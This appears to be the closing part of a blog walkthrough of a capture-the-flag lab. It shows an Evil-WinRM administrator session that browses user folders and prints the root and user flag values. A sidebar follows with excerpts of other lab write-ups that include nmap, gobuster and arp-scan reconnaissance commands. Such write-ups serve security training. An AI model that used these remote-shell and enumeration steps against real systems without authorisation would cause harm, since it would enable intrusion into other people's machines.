d-r---          7/3/2024   9:15 PM                Contacts
d-r---          7/3/2024   9:49 PM                Desktop
d-r---          7/3/2024   9:15 PM                Documents
d-r---          7/3/2024   9:15 PM                Downloads
d-r---          7/3/2024   9:15 PM                Favorites
d-r---          7/3/2024   9:15 PM                Links
d-r---          7/3/2024   9:15 PM                Music
d-r---          7/3/2024   9:17 PM                Pictures
d-r---          7/3/2024   9:15 PM                Saved Games
d-r---          7/3/2024   9:17 PM                Searches
d-r---          9/2/2024   7:05 PM                Videos

*Evil-WinRM* PS C:\Users\administrator> cd Desktop
*Evil-WinRM* PS C:\Users\administrator\Desktop> ls

Gotcha! I have to discovered the root flag you can see below in this path which is:
  • C:\Users\administrator\Desktop\root.txt

    Directorio: C:\Users\administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/2/2024   7:15 PM             70 root.txt


*Evil-WinRM* PS C:\Users\administrator\Desktop> type root.txt
9924b42399b3e0704068a3012871dc98
*Evil-WinRM* PS C:\Users\administrator> cd ..
*Evil-WinRM* PS C:\Users> ls

    Directorio: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          9/2/2024   6:16 PM                administrator
d-----          9/2/2024   6:13 PM                DefaultAppPool
d-----          9/2/2024   6:40 PM                f.miller
d-----          9/2/2024   6:37 PM                j.wilson
d-----          9/2/2024   6:35 PM                m.davis
d-----          9/2/2024   6:22 PM                p.smith
d-r---          7/3/2024   8:04 PM                Public


*Evil-WinRM* PS C:\Users> cd j.wilson
*Evil-WinRM* PS C:\Users\j.wilson> ls

    Directorio: C:\Users\j.wilson

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---          9/2/2024   6:37 PM                3D Objects
d-r---          9/2/2024   6:37 PM                Contacts
d-r---          9/2/2024   7:14 PM                Desktop
d-r---          9/2/2024   7:12 PM                Documents
d-r---          9/2/2024   6:37 PM                Downloads
d-r---          9/2/2024   6:37 PM                Favorites
d-r---          9/2/2024   6:37 PM                Links
d-r---          9/2/2024   6:37 PM                Music
d-r---          9/2/2024   6:38 PM                Pictures
d-r---          9/2/2024   6:37 PM                Saved Games
d-r---          9/2/2024   6:38 PM                Searches
d-r---          9/2/2024   6:37 PM                Videos

Gotcha! I have discovered the user flag you can see below in this path which is:
  • C:\Users\j.wilson\Desktop\user.txt
*Evil-WinRM* PS C:\Users\j.wilson> cd Desktop
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> ls


    Directorio: C:\Users\j.wilson\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/2/2024   7:14 PM             70 user.txt

*Evil-WinRM* PS C:\Users\j.wilson\Desktop> type user.txt
50e5add3f5cb0642fefc5e907086b313

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »